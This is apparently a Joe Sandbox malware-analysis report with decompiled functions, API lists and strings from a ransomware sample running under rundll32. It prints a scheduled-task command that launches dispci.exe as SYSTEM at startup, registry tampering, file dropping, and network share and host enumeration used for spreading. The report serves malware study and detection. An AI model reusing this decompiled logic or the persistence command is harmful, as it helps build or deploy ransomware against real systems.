Associated: 00000003.00000002.335320372.00000000007B0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.335914772.00000000007BD000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.336086446.00000000007C3000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.336118743.00000000007C9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7b0000_rundll32.jbxd

Similarity

API ID: DirectoryEnvironmentSleepSystemVariablelstrcatwsprintf$CreateProcess
String ID: ComSpec$\cmd.exe$schtasks /Create /RU SYSTEM /SC ONSTART /TN rhaegal /TR "%ws /C Start \"\" \"%wsdispci.exe\" -id %u && exit"$schtasks /Delete /F /TN rhaegal
API String ID: 2538701606-2521368254
Opcode ID: 3cbadc3f9139ca0f730f8d677ca97e78105540cd8a8326f47e5b6e198c86b2e2
Instruction ID: 44d9b0b727c1f45d3d63726a29a472582ae6093fc1ee98d47c065980cc7c0e2b
Opcode Fuzzy Hash: 3cbadc3f9139ca0f730f8d677ca97e78105540cd8a8326f47e5b6e198c86b2e2
Instruction Fuzzy Hash: C30180B6600258AACB20ABB59C0DFD7776DEB84701F404165B905E2151EA78CA85CAB4

Uniqueness

Uniqueness Score: -1.00%

Function 007B11EF Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 119
registryCOMMON

Download Yara Rule

C-Code - Quality: 96%

			E007B11EF(int _a4, short* _a8) {
				long _v8;
				void* _v12;
				int _v16;
				char _v2064;
				long _t42;
				intOrPtr* _t43;
				long _t49;
				long _t60;
				char* _t62;
				char* _t63;
				int _t68;
				intOrPtr _t70;
				intOrPtr* _t71;
				char _t72;
				int _t73;
				void* _t74;
				char _t75;
				char* _t76;
				char _t77;
				char* _t79;
				void* _t81;

				_t42 = RegOpenKeyW(0x80000002, _a4,  &_v12); // executed
				if(_t42 != 0) {
					return _t42;
				}
				_t43 = L"cscc";
				_t74 = _t43 + 2;
				do {
					_t70 =  *_t43;
					_t43 = _t43 + 2;
				} while (_t70 != 0);
				_t68 = (_t43 - _t74 >> 1) + (_t43 - _t74 >> 1) + 2;
				_t79 =  &_v2064;
				_a4 = 0x800;
				_t49 = RegQueryValueExW(_v12, _a8, 0,  &_v16, _t79,  &_a4); // executed
				_v8 = _t49;
				if(_t49 == 0) {
					if(_v16 != 7 || _a4 + _t68 > 0x800) {
						_v8 = 0x65d;
						goto L23;
					} else {
						if(_v2064 == 0) {
							L20:
							memmove(_t81 + _t68 - 0x80c,  &_v2064, _a4);
							memcpy( &_v2064, L"cscc", _t68);
							_a4 = _a4 + _t68;
							_t60 = RegSetValueExW(_v12, _a8, 0, 7,  &_v2064, _a4); // executed
							_v8 = _t60;
							if(_t60 == 0) {
								_v8 = RegFlushKey(_v12);
							}
							L23:
							RegCloseKey(_v12); // executed
							return _v8;
						} else {
							goto L9;
						}
						do {
							L9:
							_t71 = L"cscc";
							_t62 = _t79;
							while(1) {
								_t75 =  *_t62;
								if(_t75 !=  *_t71) {
									break;
								}
								if(_t75 == 0) {
									L14:
									_t62 = 0;
									L16:
									if(_t62 == 0) {
										goto L23;
									}
									_t63 = _t79;
									_t76 =  &(_t63[2]);
									do {
										_t72 =  *_t63;
										_t63 =  &(_t63[2]);
									} while (_t72 != 0);
									goto L19;
								}
								_t77 = _t62[2];
								if(_t77 !=  *((intOrPtr*)(_t71 + 2))) {
									break;
								}
								_t62 =  &(_t62[4]);
								_t71 = _t71 + 4;
								if(_t77 != 0) {
									continue;
								}
								goto L14;
							}
							asm("sbb eax, eax");
							asm("sbb eax, 0xffffffff");
							goto L16;
							L19:
							_t79 =  &(_t79[2 + (_t63 - _t76 >> 1) * 2]);
						} while ( *_t79 != _t72);
						goto L20;
					}
				}
				_t73 = 2;
				if(_t49 != _t73) {
					goto L23;
				}
				_v2064 = 0;
				_a4 = _t73;
				goto L20;
			}

0x007b1204
0x007b120c
0x007b1365
0x007b1365
0x007b1212
0x007b1217
0x007b121a
0x007b121a
0x007b121d
0x007b1220
0x007b122b
0x007b1233
0x007b1245
0x007b124f
0x007b1255
0x007b125a
0x007b1279
0x007b134f
0x00000000
0x007b128f
0x007b1297
0x007b12f0
0x007b1302
0x007b1315
0x007b131a
0x007b1334
0x007b133a
0x007b133f
0x007b134a
0x007b134a
0x007b1356
0x007b1359
0x00000000
0x00000000
0x00000000
0x00000000
0x007b1299
0x007b1299
0x007b1299
0x007b129e
0x007b12a0
0x007b12a0
0x007b12a6
0x00000000
0x00000000
0x007b12ab
0x007b12c2
0x007b12c2
0x007b12cb
0x007b12cd
0x00000000
0x00000000
0x007b12d3
0x007b12d5
0x007b12d8
0x007b12d8
0x007b12db
0x007b12de
0x00000000
0x007b12d8
0x007b12ad
0x007b12b5
0x00000000
0x00000000
0x007b12b7
0x007b12ba
0x007b12c0
0x00000000
0x00000000
0x00000000
0x007b12c0
0x007b12c6
0x007b12c8
0x00000000
0x007b12e3
0x007b12e7
0x007b12eb
0x00000000
0x007b1299
0x007b1279
0x007b125e
0x007b1261
0x00000000
0x00000000
0x007b1269
0x007b1270
0x00000000

APIs

RegOpenKeyW.ADVAPI32(80000002,?,?), ref: 007B1204
RegQueryValueExW.KERNELBASE(00000800,?,00000000,?,?,?,00000000,?), ref: 007B124F
memmove.MSVCRT ref: 007B1302
memcpy.MSVCRT ref: 007B1315
RegSetValueExW.KERNELBASE(00000800,00000007,00000000,00000007,?,00000800), ref: 007B1334
RegFlushKey.ADVAPI32(00000800), ref: 007B1344
RegCloseKey.KERNELBASE(00000800), ref: 007B1359

Strings

cscc, xrefs: 007B1212, 007B1299, 007B130F

Memory Dump Source

Source File: 00000003.00000002.335449220.00000000007B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: true

Associated: 00000003.00000002.335320372.00000000007B0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.335914772.00000000007BD000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.336086446.00000000007C3000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.336118743.00000000007C9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7b0000_rundll32.jbxd

Similarity

API ID: Value$CloseFlushOpenQuerymemcpymemmove
String ID: cscc
API String ID: 3731182797-3289078142
Opcode ID: 3c21ee18b773845cafee3010efc1d54385dd5fbd9036e8293ceef22cc3c41833
Instruction ID: 9f0939d26d427a7f0cf9d2b3bdf9da59c2e1bebbffd1662ee891fe68eb1a4d15
Opcode Fuzzy Hash: 3c21ee18b773845cafee3010efc1d54385dd5fbd9036e8293ceef22cc3c41833
Instruction Fuzzy Hash: 1A418871A00209ABDF209FA4CC55BEA7BB9FF14744F90C165E945E7290F739DA84CB90

Uniqueness

Uniqueness Score: -1.00%

Function 007B10A7 Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 100
memoryCOMMON

Download Yara Rule

C-Code - Quality: 79%

			E007B10A7() {
				void* _v8;
				char _v12;
				short _v532;
				short _v1052;
				void* __ebx;
				signed int _t37;
				void* _t38;
				signed int _t41;
				void* _t42;
				void* _t43;
				void* _t49;
				intOrPtr* _t55;
				void* _t58;
				intOrPtr* _t59;
				signed char _t62;
				signed int _t64;
				signed int _t65;
				signed int _t66;
				intOrPtr _t67;
				intOrPtr _t69;
				short _t70;
				void* _t71;
				void* _t72;
				short _t73;
				void* _t75;

				_t62 = 2;
				_t73 = 0;
				if(( *0x7c7bc0 & _t62) == 0) {
					L20:
					return _t73;
				}
				if(( *0x7c7b7c & 0x00000040) != 0) {
					_t37 = 0;
					__eflags = 0;
					do {
						_t17 = _t37 + L"C:\\Windows\\"; // 0x3a0043
						_t64 =  *_t17 & 0x0000ffff;
						 *(_t75 + _t37 - 0x210) = _t64;
						_t37 = _t37 + _t62;
						__eflags = _t64;
					} while (_t64 != 0);
				} else {
					ExpandEnvironmentStringsW(L"%ALLUSERSPROFILE%",  &_v532, 0x104);
					_t55 =  &_v532;
					_t71 = _t55 + 2;
					do {
						_t67 =  *_t55;
						_t55 = _t55 + _t62;
					} while (_t67 != 0);
					_t58 = (_t55 - _t71 >> 1) + (_t55 - _t71 >> 1);
					if( *((short*)(_t75 + _t58 - 0x212)) == 0x5c) {
						L10:
						_t38 = 0;
						do {
							_t65 =  *(_t75 + _t38 - 0x210) & 0x0000ffff;
							 *(_t75 + _t38 - 0x418) = _t65;
							_t38 = _t38 + _t62;
						} while (_t65 != 0);
						_push( &_v12);
						_push( &_v8);
						_t41 = 9; // executed
						_t42 = E007B8313(_t41); // executed
						if(_t42 == 0) {
							goto L20;
						}
						_t43 = 0;
						do {
							_t66 =  *(_t75 + _t43 - 0x210) & 0x0000ffff;
							 *(_t75 + _t43 - 0x418) = _t66;
							_t43 = _t43 + _t62;
						} while (_t66 != 0);
						if(PathAppendW( &_v1052, L"dispci.exe") != 0) {
							_t49 = E007B87E7(_v12,  &_v1052, _v8); // executed
							_t88 = _t49;
							if(_t49 != 0) {
								E007B1000(_t88,  &_v532); // executed
								if(E007B1531() == 0) {
									_t73 = 1;
								}
							}
						}
						RtlFreeHeap(GetProcessHeap(), 0, _v8); // executed
						goto L20;
					}
					 *((short*)(_t75 + _t58 - 0x20e)) = 0;
					_t59 =  &_v532;
					_t72 = _t59 + 2;
					do {
						_t69 =  *_t59;
						_t59 = _t59 + _t62;
					} while (_t69 != 0);
					_t70 = 0x5c;
					 *((short*)(_t75 + (_t59 - _t72 >> 1) * 2 - 0x210)) = _t70;
				}
			}

0x007b10b4
0x007b10b5
0x007b10bd
0x007b11e9
0x007b11ee
0x007b11ee
0x007b10ca
0x007b1135
0x007b1135
0x007b1137
0x007b1137
0x007b1137
0x007b113e
0x007b1146
0x007b1148
0x007b1148
0x007b10cc
0x007b10dd
0x007b10e3
0x007b10e9
0x007b10ec
0x007b10ec
0x007b10ef
0x007b10f1
0x007b10fa
0x007b1105
0x007b114d
0x007b114d
0x007b114f
0x007b114f
0x007b1157
0x007b115f
0x007b1161
0x007b1169
0x007b116d
0x007b1170
0x007b1171
0x007b1178
0x00000000
0x00000000
0x007b117a
0x007b117c
0x007b117c
0x007b1184
0x007b118c
0x007b118e
0x007b11a7
0x007b11b6
0x007b11bb
0x007b11bd
0x007b11c6
0x007b11d2
0x007b11d6
0x007b11d6
0x007b11d2
0x007b11bd
0x007b11e3
0x00000000
0x007b11e3
0x007b1109
0x007b1111
0x007b1117
0x007b111a
0x007b111a
0x007b111d
0x007b111f
0x007b112a
0x007b112b
0x007b112b

APIs

ExpandEnvironmentStringsW.KERNEL32(%ALLUSERSPROFILE%,?,00000104), ref: 007B10DD
PathAppendW.SHLWAPI(?,dispci.exe,?,?), ref: 007B119F
GetProcessHeap.KERNEL32(00000000,?), ref: 007B11DC
RtlFreeHeap.NTDLL(00000000), ref: 007B11E3

Strings

dispci.exe, xrefs: 007B1193
%ALLUSERSPROFILE%, xrefs: 007B10D8
\, xrefs: 007B10FC
Oet Uet0Xet, xrefs: 007B11DC

Memory Dump Source

Source File: 00000003.00000002.335449220.00000000007B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: true

Associated: 00000003.00000002.335320372.00000000007B0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.335914772.00000000007BD000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.336086446.00000000007C3000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.336118743.00000000007C9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7b0000_rundll32.jbxd

Similarity

API ID: Heap$AppendEnvironmentExpandFreePathProcessStrings
String ID: Oet Uet0Xet$%ALLUSERSPROFILE%$\$dispci.exe
API String ID: 1077166327-2496986081
Opcode ID: 13e2994a7c69a76bc08413846564571950310df8357c7f8f1f3882da459429f8
Instruction ID: 5e1b97b4f3b40c271cc964716074cbad0a607f257c479110793aeb3e79afc7f1
Opcode Fuzzy Hash: 13e2994a7c69a76bc08413846564571950310df8357c7f8f1f3882da459429f8
Instruction Fuzzy Hash: CD31737154020EDACB10ABEC9CA9FEA77A8FF14754F944879EA05C3190F66C8E848B64

Uniqueness

Uniqueness Score: -1.00%

Function 007B77D1 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 58
sleepthreadCOMMON

Download Yara Rule

C-Code - Quality: 83%

			E007B77D1() {
				char _v8;
				char _v528;
				char* _t12;
				void* _t13;
				void* _t21;
				void* _t24;

				_t21 =  *0x7c7bb8;
				E007B6B95(L"127.0.0.1", 1);
				E007B6B95(L"localhost", 1, _t21); // executed
				E007B6B95(L"0.0.0.0", 1, _t21);
				_t12 =  &_v528;
				_v8 = 0x104;
				__imp__GetComputerNameExW(4, _t12,  &_v8);
				if(_t12 != 0) {
					E007B6B95( &_v528, 1, _t21);
				}
				_t13 = CreateThread(0, 0, E007B8B2E, _t21, 0, 0); // executed
				if(_t13 != 0) {
					FindCloseChangeNotification(_t13); // executed
				}
				_t24 = 0;
				L5:
				E007B733C(_t21); // executed
				E007B742C(_t21); // executed
				if(_t24 == 0) {
					E007B751B(_t21, 0x80000000, 0); // executed
					_t24 = 1;
				}
				Sleep(0x2bf20);
				goto L5;
			}

0x007b77dd
0x007b77ec
0x007b77f7
0x007b7802
0x007b780b
0x007b7814
0x007b781b
0x007b7823
0x007b782c
0x007b782c
0x007b783d
0x007b7845
0x007b7848
0x007b7848
0x007b784e
0x007b7850
0x007b7851
0x007b7857
0x007b785e
0x007b7867
0x007b786e
0x007b786e
0x007b7874
0x00000000

APIs

GetComputerNameExW.KERNEL32(00000004,?,?,?,?,?), ref: 007B781B
CreateThread.KERNELBASE(00000000,00000000,Function_00008B2E,?,00000000,00000000), ref: 007B783D
FindCloseChangeNotification.KERNELBASE(00000000), ref: 007B7848
Sleep.KERNEL32(0002BF20,?,?), ref: 007B7874

Strings

0.0.0.0, xrefs: 007B77FD
localhost, xrefs: 007B77F2
127.0.0.1, xrefs: 007B77E7

Memory Dump Source

Source File: 00000003.00000002.335449220.00000000007B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: true

Associated: 00000003.00000002.335320372.00000000007B0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.335914772.00000000007BD000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.336086446.00000000007C3000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.336118743.00000000007C9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7b0000_rundll32.jbxd

Similarity

API ID: ChangeCloseComputerCreateFindNameNotificationSleepThread
String ID: 0.0.0.0$127.0.0.1$localhost
API String ID: 3743365020-4042105963
Opcode ID: 12e6922bf68ead640b3ff6b32febe3949370a29b18a14eb7959ac57d0fcceca0
Instruction ID: 2f3e017ad2e02b95db775c86c7381285170c3339b1dacb1dfb81f13ac55bdc7c
Opcode Fuzzy Hash: 12e6922bf68ead640b3ff6b32febe3949370a29b18a14eb7959ac57d0fcceca0
Instruction Fuzzy Hash: B50175F1504118BAD7347BB55C8DFEBBABCDB85B50F510278BA01E2052EA6C9D01C9B1

Uniqueness

Uniqueness Score: -1.00%

Function 007B8AB3 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 52
memoryCOMMON

Download Yara Rule

C-Code - Quality: 58%

			E007B8AB3(void* __ecx, void* _a4) {
				void _v8;
				intOrPtr _v12;
				void* __esi;
				intOrPtr _t10;
				void* _t14;
				void _t21;
				void* _t24;
				intOrPtr* _t28;
				void* _t30;

				_t30 = _a4;
				_t21 =  *_t30;
				_t10 =  *((intOrPtr*)(_t30 + 4));
				_v8 = _t21;
				_v12 = _t10;
				if(_t21 >= _t10) {
					L6:
					LocalFree(_t30);
					return 0;
				}
				_t28 = __imp__#14;
				do {
					_t14 = E007BA567( *_t28(_t21)); // executed
					if(_t14 != 0) {
						__imp__#12( *_t28(_t21));
						_t24 = E007B641A(_t15);
						if(_t24 != 0) {
							E007B6B95(_t16, 0,  *((intOrPtr*)(_t30 + 8)));
							HeapFree(GetProcessHeap(), 0, _t24);
							_t30 = _a4;
						}
					}
					_t21 = _v8 + 1;
					_v8 = _t21;
				} while (_t21 < _v12);
				goto L6;
			}

0x007b8aba
0x007b8abd
0x007b8abf
0x007b8ac3
0x007b8ac6
0x007b8acb
0x007b8b1e
0x007b8b1f
0x007b8b2b
0x007b8b2b
0x007b8acd
0x007b8ad3
0x007b8ad7
0x007b8ade
0x007b8ae4
0x007b8af0
0x007b8af4
0x007b8afb
0x007b8b09
0x007b8b0f
0x007b8b0f
0x007b8af4
0x007b8b15
0x007b8b16
0x007b8b19
0x00000000

APIs

htonl.WS2_32(74656490), ref: 007B8AD4
htonl.WS2_32(74656490), ref: 007B8AE1
inet_ntoa.WS2_32(00000000), ref: 007B8AE4

Part of subcall function 007B641A: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,77974AB0,?), ref: 007B6439
Part of subcall function 007B641A: GetProcessHeap.KERNEL32(00000000,00000000), ref: 007B6446
Part of subcall function 007B641A: HeapAlloc.KERNEL32(00000000), ref: 007B644D
Part of subcall function 007B641A: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,?), ref: 007B6465

GetProcessHeap.KERNEL32(00000000,00000000,?,00000000,?,00000000), ref: 007B8B02
HeapFree.KERNEL32(00000000,?,00000000), ref: 007B8B09
LocalFree.KERNEL32(?), ref: 007B8B1F

Strings

Oet Uet0Xet, xrefs: 007B8B02

Memory Dump Source

Source File: 00000003.00000002.335449220.00000000007B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: true

Associated: 00000003.00000002.335320372.00000000007B0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.335914772.00000000007BD000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.336086446.00000000007C3000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.336118743.00000000007C9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7b0000_rundll32.jbxd

Similarity

API ID: Heap$ByteCharFreeMultiProcessWidehtonl$AllocLocalinet_ntoa
String ID: Oet Uet0Xet
API String ID: 3470587009-3175316637
Opcode ID: 22ddb7cd1d91459cd5d63b02f717e3e8efa5e8b494ca9b36794efc0c889c84cf
Instruction ID: 0e8fae358813bd3faed0ba01cd9d3258c84b58126c9c99ee92d33a46b7cd71ba
Opcode Fuzzy Hash: 22ddb7cd1d91459cd5d63b02f717e3e8efa5e8b494ca9b36794efc0c889c84cf
Instruction Fuzzy Hash: 02010CB5900259ABCB10AFB5DD89E9FBBACFE483547148525E501E7201EA78EE00CA65

Uniqueness

Uniqueness Score: -1.00%

Function 007BA476 Relevance: 12.1, APIs: 8, Instructions: 86networkCOMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 007BA4A5
socket.WS2_32(00000002,00000001,00000000), ref: 007BA4C3
htons.WS2_32(?), ref: 007BA4E3
ioctlsocket.WS2_32(00000000,8004667E,?), ref: 007BA4F7
connect.WS2_32(00000000,?,00000010), ref: 007BA509
select.WS2_32(00000001,00000000,?,00000000,?), ref: 007BA536
__WSAFDIsSet.WS2_32(00000000,?), ref: 007BA549
closesocket.WS2_32(00000000), ref: 007BA557

Memory Dump Source

Source File: 00000003.00000002.335449220.00000000007B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: true

Associated: 00000003.00000002.335320372.00000000007B0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.335914772.00000000007BD000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.336086446.00000000007C3000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.336118743.00000000007C9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7b0000_rundll32.jbxd

Similarity

API ID: closesocketconnecthtonsioctlsocketmemsetselectsocket
String ID:
API String ID: 1369790671-0
Opcode ID: 7f0a74859eefde4856d516d1130e76197b65936a7c848affdd6676bb87da8aed
Instruction ID: 65aecba4a2c2715abffde1a70cbe8fb49c395f7f89ab204848cba35c386a92f6
Opcode Fuzzy Hash: 7f0a74859eefde4856d516d1130e76197b65936a7c848affdd6676bb87da8aed
Instruction Fuzzy Hash: B5312BB1800219BBDB209FA8CC48FEEBBBCEF48310F00466AF555E2150E7789A558B55

Uniqueness

Uniqueness Score: -1.00%

Function 007B7F04 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 72
synchronizationCOMMON

Download Yara Rule

C-Code - Quality: 90%

			E007B7F04() {
				long _v8;
				void _v38;
				short _v40;
				void _v74;
				short _v76;
				void* _t23;
				void* _t27;
				struct _SECURITY_ATTRIBUTES* _t33;
				signed int _t35;
				intOrPtr _t39;
				void* _t44;
				void* _t46;

				_t35 = 7;
				_v40 = 0;
				memset( &_v38, 0, _t35 << 2);
				asm("stosw");
				_push(8);
				_v76 = 0;
				memset( &_v74, 0, 0 << 2);
				_t33 = 0;
				_v8 = 0x10;
				if(GetComputerNameW( &_v40,  &_v8) == 0) {
					L8:
					return _t33;
				} else {
					_t46 = 0;
					_t23 = E007B7D8D(0,  &_v40, _v8);
					_t39 =  *0x7c3984; // 0x444ff8
					_t44 = _t23;
					if(_t39 != 0) {
						_t30 =  *0x7c7b94;
						if( *0x7c7b94 != 0) {
							_t46 = E007B7D8D(_t39, _t39, _t30 >> 1);
						}
					}
					wsprintfW( &_v76, L"%08X%08X", _t44, _t46);
					_t27 = CreateMutexW(_t33, _t33,  &_v76); // executed
					if(_t27 == 0) {
						GetLastError();
					} else {
						if(GetLastError() == 0xb7) {
							_t33 = 1;
						}
					}
					goto L8;
				}
			}

0x007b7f10
0x007b7f11
0x007b7f18
0x007b7f1a
0x007b7f1e
0x007b7f21
0x007b7f28
0x007b7f32
0x007b7f34
0x007b7f43
0x007b7fb2
0x007b7fb6
0x007b7f45
0x007b7f4d
0x007b7f4f
0x007b7f54
0x007b7f5a
0x007b7f5e
0x007b7f60
0x007b7f67
0x007b7f72
0x007b7f72
0x007b7f67
0x007b7f7f
0x007b7f8e
0x007b7f97
0x007b7fab
0x007b7f99
0x007b7fa4
0x007b7fa8
0x007b7fa8
0x007b7fa4
0x00000000
0x007b7f97

APIs

GetComputerNameW.KERNEL32 ref: 007B7F3B
wsprintfW.USER32 ref: 007B7F7F
CreateMutexW.KERNELBASE(00000000,00000000,?), ref: 007B7F8E
GetLastError.KERNEL32 ref: 007B7F99
GetLastError.KERNEL32 ref: 007B7FAB

Strings

%08X%08X, xrefs: 007B7F79

Memory Dump Source

Source File: 00000003.00000002.335449220.00000000007B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: true

Associated: 00000003.00000002.335320372.00000000007B0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.335914772.00000000007BD000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.336086446.00000000007C3000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.336118743.00000000007C9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7b0000_rundll32.jbxd

Similarity

API ID: ErrorLast$ComputerCreateMutexNamewsprintf
String ID: %08X%08X
API String ID: 4289762557-1563805794
Opcode ID: a079c161e64a6ab225680e2a43e3e0f21cbac32e03f8ef38820f4afb776966e1
Instruction ID: bd572d3de94dff23da87a88130d38a4b524cec6311335694daae1ddc26548bf0
Opcode Fuzzy Hash: a079c161e64a6ab225680e2a43e3e0f21cbac32e03f8ef38820f4afb776966e1
Instruction Fuzzy Hash: CA117C72A04149AFDB14DBA4DC88EEEB7BDEF88344F104569F501E2150EB789E06CB69

Uniqueness

Uniqueness Score: -1.00%

Function 007BA420 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 40
memorythreadCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E007BA420(void* __ecx, void _a4) {
				long _v8;
				void* _t9;
				void* _t20;

				_v8 = 0;
				_t20 = HeapAlloc(GetProcessHeap(), 8, 4);
				if(_t20 != 0) {
					 *_t20 = _a4; // executed
					_t9 = CreateThread(0, 0, E007BA333, _t20, 0, 0); // executed
					_v8 = _t9;
					if(_t9 == 0) {
						HeapFree(GetProcessHeap(), 0, _t20);
					}
				}
				return _v8;
			}

0x007ba433
0x007ba43f
0x007ba443
0x007ba452
0x007ba454
0x007ba45a
0x007ba45f
0x007ba466
0x007ba466
0x007ba45f
0x007ba473

APIs

GetProcessHeap.KERNEL32(00000008,00000004,746543E0,?,00000000,?,?,007B7B89,000000FF), ref: 007BA436
HeapAlloc.KERNEL32(00000000,?,?,007B7B89,000000FF), ref: 007BA439
CreateThread.KERNELBASE ref: 007BA454
GetProcessHeap.KERNEL32(00000000,00000000,?,?,007B7B89,000000FF), ref: 007BA463
HeapFree.KERNEL32(00000000,?,?,007B7B89,000000FF), ref: 007BA466

Strings

Uet0Xet, xrefs: 007BA466

Memory Dump Source

Source File: 00000003.00000002.335449220.00000000007B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: true

Associated: 00000003.00000002.335320372.00000000007B0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.335914772.00000000007BD000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.336086446.00000000007C3000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.336118743.00000000007C9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7b0000_rundll32.jbxd

Similarity

API ID: Heap$Process$AllocCreateFreeThread
String ID: Uet0Xet
API String ID: 3966119241-1689521831
Opcode ID: b10e5e7d3d984fd0d2ca7bf97db75f47105515f6885fd2a814cc2a21053053d7
Instruction ID: d2b9643642cfbd3a189aa0098479c967dd8e130cc08a50fc2683d72eacd08f6c
Opcode Fuzzy Hash: b10e5e7d3d984fd0d2ca7bf97db75f47105515f6885fd2a814cc2a21053053d7
Instruction Fuzzy Hash: 5AF030F5500259BFD7207FA99C8DEDBBFACEB85394B108529F601D3100D5789D04CA64

Uniqueness

Uniqueness Score: -1.00%

Function 007B75D8 Relevance: 9.1, APIs: 6, Instructions: 103
sharememoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E007B75D8(intOrPtr _a4, int _a8) {
				int _v8;
				int _v12;
				int _v16;
				void* _v20;
				void* _v24;
				void* __esi;
				int _t36;
				void* _t38;
				int _t42;
				short* _t47;
				signed int _t55;
				signed int _t56;
				signed int _t58;
				intOrPtr* _t61;
				void* _t63;
				signed int _t66;
				void* _t67;

				_v12 = _v12 | 0xffffffff;
				_v16 = 0;
				_v8 = 0x4000;
				_t36 = WNetOpenEnumW(1, 0, 0, _a8,  &_v20); // executed
				if(_t36 == 0) {
					_t38 = GlobalAlloc(0x40, _v8); // executed
					_t63 = _t38;
					_v24 = _t63;
					if(_t63 != 0) {
						_v16 = 1;
						while(1) {
							memset(_t63, 0, _v8);
							_t67 = _t67 + 0xc;
							_t42 = WNetEnumResourceW(_v20,  &_v12, _t63,  &_v8);
							if(_t42 != 0) {
								break;
							}
							_a8 = 0;
							if(_v12 > 0) {
								_t16 = _t63 + 0x14; // 0x14
								_t61 = _t16;
								do {
									_t55 = 2;
									if(( *(_t61 - 8) & _t55) != _t55) {
										_t47 =  *_t61;
										if(_t47 != 0 &&  *_t47 == 0x5c &&  *((short*)(_t47 + 2)) == 0x5c) {
											_t56 =  *(_t47 + 4) & 0x0000ffff;
											if(_t56 != 0) {
												_t66 = _t56;
												while(_t66 != 0x5c) {
													_t55 = _t55 + 1;
													_t58 =  *(_t47 + _t55 * 2) & 0x0000ffff;
													_t66 = _t58;
													if(_t58 != 0) {
														continue;
													}
													goto L15;
												}
											}
											L15:
											 *(_t47 + _t55 * 2) = 0;
											E007B6B95( *_t61 + 4, 0, _a4);
											_t63 = _v24;
										}
									} else {
										_t18 = _t61 - 0x14; // 0x0
										E007B75D8(_a4, _t18);
									}
									_a8 = _a8 + 1;
									_t61 = _t61 + 0x20;
								} while (_a8 < _v12);
							}
						}
						if(_t42 != 0x103) {
							_v16 = 0;
						}
						GlobalFree(_t63);
						WNetCloseEnum(_v20);
					}
				}
				return _v16;
			}

0x007b75de
0x007b75f3
0x007b75f6
0x007b75fd
0x007b7605
0x007b7611
0x007b7617
0x007b7619
0x007b761e
0x007b7624
0x007b7627
0x007b762c
0x007b7631
0x007b7640
0x007b7648
0x00000000
0x00000000
0x007b764e
0x007b7654
0x007b7656
0x007b7656
0x007b7659
0x007b765e
0x007b7663
0x007b7673
0x007b7677
0x007b7686
0x007b768d
0x007b768f
0x007b7691
0x007b7697
0x007b7698
0x007b769c
0x007b76a1
0x00000000
0x00000000
0x00000000
0x007b76a1
0x007b7691
0x007b76a3
0x007b76a8
0x007b76b3
0x007b76b8
0x007b76b8
0x007b7665
0x007b7665
0x007b766c
0x007b766c
0x007b76bb
0x007b76c1
0x007b76c4
0x007b76c9
0x007b7654
0x007b76d3
0x007b76d5
0x007b76d5
0x007b76d9
0x007b76e2
0x007b76e2
0x007b76e8
0x007b76ef

APIs

